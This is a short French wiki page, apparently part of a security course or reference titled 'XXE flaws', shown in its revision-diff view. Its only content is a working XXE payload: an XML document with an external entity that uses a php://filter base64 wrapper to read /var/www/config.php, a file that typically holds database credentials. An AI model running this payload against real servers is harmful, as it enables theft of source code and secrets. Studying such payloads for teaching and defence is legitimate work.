« 1.9 Failles XXE » : différence entre les versions
Aller à la navigation
Aller à la recherche
Aucun résumé des modifications |
(Aucune différence)
|
Dernière version du 21 octobre 2014 à 16:32
Lire du code PHP avec une faille XXE
<?xml version="1.0"?> <!DOCTYPE results [ <!ENTITY harmless SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/config.php" > ]> <results> <result>&harmless;</result> </results